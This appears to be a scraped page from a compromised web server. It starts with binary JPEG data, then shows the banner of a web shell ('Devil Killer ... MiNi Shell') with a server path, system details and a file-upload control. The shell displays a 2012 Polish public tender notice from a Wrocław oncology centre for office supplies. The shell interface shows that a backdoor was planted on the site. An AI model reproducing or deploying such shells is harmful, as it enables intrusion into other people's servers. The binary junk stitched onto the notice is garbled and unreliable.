JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/174620-N-2012.html

<p class="kh_header"><b>Wrocław: sukcesywna dostawa artykułów biurowych i papierniczych z podziałem na 2 pakiety w okresie 12 miesięcy</b><br>
<b>Numer ogłoszenia: 174620 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Onkologii we Wrocławiu , pl. Hirszfelda 12, 53-413 Wrocław, woj. dolnośląskie, tel. 71 3689584, faks 71 36 89 583; 36 89 234.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dco.com.pl, www.przetargipubliczne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywna dostawa artykułów biurowych i papierniczych z podziałem na 2 pakiety w okresie 12 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa artykułów biurowych i papierniczych z podziałem na 2 pakiety w okresie 12 miesięcy o minimalnych wymaganych parametrach użytkowych i ilościowych określonych w Formularzu Asortymentowo-Cenowym stanowiącym załącznik Nr 1 i 2 do SIWZ,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości: Pakiet Nr 1- 2.400,00zł, Pakiet Nr 2 - 250,00zł.
W przypadku złożenia oferty na więcej niż jeden Pakiet, wartość wadium powinna być zsumowana.
8.1.	Wadium może być wniesione w jednej lub kilku następujących formach:
8.1.1.	pieniądzu,
8.1.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.1.3.	gwarancjach bankowych,
8.1.4.	gwarancjach ubezpieczeniowych,
8.1.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 ppkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami) 	
8.2.	W przypadku wnoszenia wadium w formie gwarancji, gwarancja musi być  gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
  a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji   (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,
 b)  określenie wierzytelności, która ma być zabezpieczona gwarancją,
 c)  kwotę gwarancji,
 d)  termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
 - odmówił podpisania umowy na warunkach określonych w ofercie,
 - nie wniósł zabezpieczenia należytego wykonania umowy,
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.4. Zamawiający zatrzymuje wadium wraz z odsetkami , jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn należących po jego stronie.
8.5.	W przypadku wnoszenia wadium w formie gwarancji, z treści gwarancji musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upełnomocnionego przedstawiciela Gwaranta. Z treści powinno wynikać bezwarunkowe na każde pisemne żądanie zgłoszenie przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu kwoty wadium w okolicznościach określonych przepisami Art. 46 ust. 4 a i  5 ustawy.
8.6.	Wadium musi być wniesione przed upływem terminu składania ofert.
8.7.	Wadium w formie pieniądza należy wnieść na rachunek bankowy Zamawiającego w Kredyt Banku S.A. IV Oddział Wrocław nr 57 1500 1793 1217 9000 7528 0000. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie znajdzie się na rachunku bankowym Zamawiającego.
8.8.	Wadium wnoszone w pozostałych formach należy złożyć w formie oryginału w siedzibie Zamawiającego pl. Hirszfelda 12, budynek H pok. 416 ( godz. otwarcia 8.00-10.00 i 12.00-14.00) najpóźniej do TERMINU składania ofert. Prosimy nie załączać oryginału dokumentu stanowiącego wadium przetargowe do oferty.
8.9.	Prosimy o dołączenie do oferty kserokopii potwierdzonego za zgodność z oryginałem dokumentu stanowiącego wadium przetargowe.
8.10.	Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z postępowania. 
8.11.	Zwrot wadium nastąpi w trybie i okolicznościach określonych w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 24 ustawy - Załącznik Nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie należytego wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej 1 dostawy (trwającej co najmniej 12 miesięcy), której przedmiot zamówienia odpowiada swym rodzajem i wartością kwotę nie mniejszą niż dla pakietu: 
Pakiet Nr 1 - 60 000,00 zł brutto, 
Pakiet Nr 2 - 5 000,00 zł brutto,.
 Spełnienie powyższego warunku dotyczy Pakietu Nr 1 i 2 osobno. Dla Pakietu Nr 1 i 2, należy złożyć oddzielny wykaz - załącznik nr 7 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykazanie zdolności finansowej zapewniającej wykonanie zamówienia tj. wykazanie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum dla:
Pakietu Nr 1 - 120 000,00zł brutto, Pakietu Nr 2 -11 000,00zł brutto, a w przypadku złożenia oferty na więcej niż jeden Pakiet, wartość polisy powinna być zsumowana.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.     W przypadku nie wyczerpania asortymentu wynikającego z niniejszej umowy przed upływem okresu do którego umowa jest zawarta, na wniosek Zamawiającego do umowy mogą zostać wprowadzone zmiany polegające na  zmianie terminu obowiązywania umowy.
2.	Zamawiający przewiduje ponadto możliwość dokonania zmiany umowy w każdym przypadku, kiedy zmiany umowy są korzystne dla Zamawiającego z zachowaniem przepisów ustawy Prawo zamówień publicznych.
3.	W przypadku zmiany osób upoważnionych do reprezentacji/odbioru/kontaktów Zamawiający i Wykonawca zobowiązują się wprowadzić zmiany do umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dco.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Onkologii we Wrocławiu
Dział Zamówień Publicznych i Logistyki
Pl. Hirszfelda 12 53-413 Wrocław
z dopiskiem: postępowanie nr ZP-PN-36-12-EZPL.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2012 godzina 10:00, miejsce: Dolnośląskie Centrum Onkologii we Wrocławiu
Dział Zamówień Publicznych i Logistyki
Pl. Hirszfelda 12 53-413 Wrocław
z dopiskiem: postępowanie nr ZP-PN-36-12-EZPL.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Antyrama z plexi na dokumenty formatu A4	szt.	10
2.	Bloki biurowe A4 w kratkę, min 100 kartek	szt.	100
3.	Bloki biurowe A5 w kratkę, min 100 kartek	szt.	100
4.	Cienkopis, plastikowa końcówka oprawiona w metal, wentylowana skuwka, tusz odporny na wysychanie,  grubość linii pisania 0,4 mm, występujący w minimum 4 kolorach: czarny , czerwony, niebieski, zielony		szt.	800
5.	Deska A4 sztywna z klipem u góry 		szt.	10
6.	Długopis  na wkłady wymienne, przezroczysta obudowa, występujący w minimum 4 kolorach: czarny, czerwony, niebieski, zielony, długość linii pisania min. 1700 m		szt.	200
7.	Długopis automatyczny  na metalowy wkład wielkopojemny z niebieskim tuszem,długość linii pisania min.2400 m		szt.	40
8.	Dziurkacz z ogranicznikiem papieru, metalowy, dziurkuje do 30 kartek 		szt.	5
9.	Etykieta Brother DK-22205 biała ciągła 62mm x 30.48m lub równoważne do drukarki Brother P-Touch QL 650TD		op	30
10.	Etykiety na rolce DYMO 11352 kod S0722520 o wym. 25mm x 54mm do drukarki kodów paskowych DYMO Label Writer  400 Turbo (1 op = 500 etykiet na rolce).		op	40
11.	Etykiety samoprzylepne na rolce o wymiarach 32mmx20mm do drukarki kodów paskowych ARGOX OS314-TT (1 opakowanie min 2000 etykiet na rolce)		op	50
12.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 105mm x 148mm (+/- 1mm) (opakowanie 100 szt.)		op.	100
13.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 105mm x 48mm (+/- 1mm) (opakowanie 100 szt.)		op.	2
14.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 210mm x 148mm (+/- 1mm) (opakowanie 100 szt.)		op.	85
15.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 33mm x 22mm (+/- 1mm) (opakowanie 100 szt.)		op.	5
16.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 38mm x 21,2mm (+/- 1mm) (opakowanie 100 szt.)		op.	58
17.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 48mm x 17mm (+/- 1mm) (opakowanie 100 szt.)		op.	2
18.	Etykiety samoprzylepne w arkuszach A4 przystosowane do drukarki HP, wymiar etykiety 70x42,3mm (+/- 1mm) (opakowanie  100 szt)		op	4
19.	Folia przezroczysta A4, bezbarwna do bindowania (opakowanie 100 szt.)		op.	4
20.	Foliopis  niezmywalny, wodoodporny bez zapachowy i szybkoschnący atrament z formułą DRY SAFE (nie wysycha bez skuwki do czterech dni po każdej gładkiej powierzchni np. folia, szkło, plastik, drewno, metal, porcelana, płyty CD-R, DVD, dostępny w min. czterech kolorach: czarny, czerwony, niebieski, zielony, grubość linii pisania 0,8-1,0 mm (M) 		szt.	150
21.	Foliopis niezmywalny, wodoodporny bez zapachowy i szybkoschnący atrament z formułą DRY SAFE (nie wysycha bez skuwki do czterech dni po każdej gładkiej powierzchni np. folia, szkło, plastik, drewno, metal, porcelana, płyty CD-R, DVD, dostępny w min. czterech kolorach: czarny, czerwony, niebieski, zielony, grubość linii pisania 0,3-0,4 mm (S) 		szt.	200
22.	Foliopis niezmywalny, wodoodporny bez zapachowy i szybkoschnący atrament z formułą DRY SAFE (nie wysycha bez skuwki do czterech dni po każdej gładkiej powierzchni np. folia, szkło, plastik, drewno, metal, porcelana, płyty CD-R, DVD, dostępny w min. czterech kolorach: czarny, czerwony, niebieski, zielony, grubość linii pisania 0,6-0,7 mm (F) 		szt.	200
23.	Formatka A4 z tektury litej makulatury szara, gramatura min 900g/m2 i grubości min 1,3 mm		szt.	400
24.	Grafity 0,5 mm HB do ołówków automatycznych  (op 12 szt..)		op	10
25.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach  O 6 mm (100 szt w opakowaniu)		op.	2
26.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 10 mm (100 szt w opakowaniu)		op.	2
27.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 12,5 mm (100 szt w opakowaniu)		op.	1
28.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 14 mm (100 szt w opakowaniu)		op	1
29.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 16 mm (100 szt w opakowaniu)		op.	1
30.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 22 mm (50 szt w opakowaniu)		op.	1
31.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 25 mm (50 szt w opakowaniu)		op.	1
32.	Grzbiety do bindowania (bindownica Fellowes PB 2450) dostępne min. w 4 kolorach O 38 mm (50 szt w opakowaniu)		op.	1
33.	Gumka dwuczęściowa do ścierania atramentu, długopisu, pisma maszynowego oraz do ścierania ołówków i kredek ołówkowych 		szt.	20
34.	Kalendarz biurkowy stojący na 2013 rok		szt.	100
35.	Kalendarz książkowy na 2013 rok, format A4, układ 1 dzień - 1 strona		szt.	2
36.	Kalendarz książkowy na 2013 rok, format A5, układ 1 dzień - 1 strona		szt.	20
37.	Kalendarz plakatowy na 2013rok		szt.	10
38.	Kalendarz trójdzielny na 2013 rok, poszczególne części kalendarza łączone spiralą (3 spirale)		szt.	40
39.	Kalka ołówkowa, (op. 100 arkuszy)		op.	5
40.	Kalkulator biurowy CITIZEN SDC-888T lub równoważny		szt.	2
41.	Klej biurowy w sztyfcie 8-9 g		szt.	110
42.	Klipy do dokumentów 19 mm (opakowanie 12 szt.) 		op. 	5
43.	Klipy do dokumentów 25 mm (opakowanie 12 szt.) 		op	5
44.	Klipy do dokumentów 32 mm (opakowanie 12 szt.) 		op	5
45.	Klipy do dokumentów 41 mm (opakowanie 12 szt.) 		op	5
46.	Koperta biała samoklejąca z paskiem, B4, bez okna		szt.	30000
47.	Koperta biała samoklejąca z paskiem, B5, bez okna		szt.	8000
48.	Koperta biała samoklejąca C6, bez okna		szt.	9000
49.	Koperta na CD/DVD biała z okienkiem wymiar 127x127mm		szt.	48000
50.	Koperta ochronna z warstwą folii bąbelkowej wewnątrz format 14D		szt.	100
51.	Koperta ochronna z warstwą folii bąbelkowej wewnątrz format 17G		szt.	500
52.	Koperta ochronna z warstwą folii bąbelkowej wewnątrz format 19I		szt.	50
53.	Koperta szara samoklejąca, z paskiem,  B4, bez okna		szt.	32000
54.	Koperta szara samoklejąca C4 (229x324mm), bez okna		szt.	500
55.	Koperty płacowe utajnione, format 210x6 (210x153cm), składanka potrójna do drukarek igłowych (druk składa się za strony jawnej - oryginału oraz sklejonej z dwóch kartek, której otworzenie jest możliwe tylko przez rozerwanie lub obcięcie brzegu (ilość składek w kartonie 1200 szt)		karton	10
56.	Kostka biurowa nieklejona ok. 80x80mm, ok. 400 kartek 		szt.	150
57.	Kostka biurowa samoprzylepna, kolor żółty, wymiar ok. 50x40mm, ilość min. 100 kartek.		szt.	600
58.	Kostka biurowa samoprzylepna, kolor żółty, wymiar ok. 75x75mm, ilość min. 100 kartek.		szt.	500
59.	Koszulka foliowa A4, przezroczysta, o krystalicznej strukturze, otwierana od góry, wzmocniony, dziurkowany brzeg z możliwością zamocowania w segregatorze		szt.	60000
60.	Koszulka foliowa A4, przezroczysta, z boczną klapką otwierana z boku, wzmocniony, dziurkowany brzeg z możliwością zamocowania w segregatorze		szt.	1000
61.	Koszulka foliowa A5, przezroczysta, o krystalicznej strukturze, otwierana od góry, wzmocniony, dziurkowany brzeg z możliwością zamocowania w segregatorze		szt.	1000
62.	Linijka 15 cm przezroczyste, plastikowe, gwarantowana dokładność wykonania skali i trwałość podziałki		szt.	20
